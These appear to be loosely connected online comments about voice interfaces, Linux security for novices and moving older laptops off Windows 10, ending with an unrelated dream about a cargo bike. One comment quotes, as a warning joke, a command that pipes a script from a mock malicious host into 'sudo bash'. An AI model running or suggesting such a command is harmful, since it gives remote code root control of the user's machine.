Talking sucks. I suck at talking. Why would I talk to a computer when I can do almost everything in a few clicks? It's insane.

They talk to the computers in star trek because people are watching a TV show and don't want to watch Data enter "scan-planet -power 99.5 -angle 45 -includeLifeforms".

Evil .exe's exist in windows, and they can get tricked into running a bad batch file or something (windows actually does a decent job of pumping the brakes on this stuff), but linux encourages novices to run what is effectively gibberish to them to fix/install/configure things.

My biggest issue with linux for friends and family who are kinda computer savvy is installing apps that aren't in one of the friendly Appstore is kind of a security nightmare.

"Well I ran this command called "curl evil-github.satan | sudo bash"...like it says right here"

it released late in 2021 so ~ 4 years. As with 10 they offered free upgrades for everyone, however there is a age of chipset they are choosing to no longer support for security reasons, which is the issue.

All of my devices I couldn't upgrade I moved to linux, and they are fine.

I think there is a sweet spot for Linux as a desktop where you either don't know enough about computers and linux works great, or you know too much about computers and it works great.

It's basically the bell curve idiot-genius meme.

It's also gotten way easier in the past few years. Driver support is leagues better, and the amount of stuff that "Just Works" is way better than it used to be.

Now if you are doing *anything* non-standard you should get ready to hit the terminal, but for most people it won't be required.

To anyone stressing out about Windows 10 end-of-life I've converted a handful of 65+ folks laptops to Ubuntu (linux) and it works just fine for what they need. Browsing, maybe some spreadsheets.

It's fine! It works and it's not intrusive at all. The only thing it nags you with is to update.

I had a dream last night that someone stole all the baskets and doodads off of my cargo bike.

When I got on to ride it home it was like I was on a rocket bike zooming around the city.
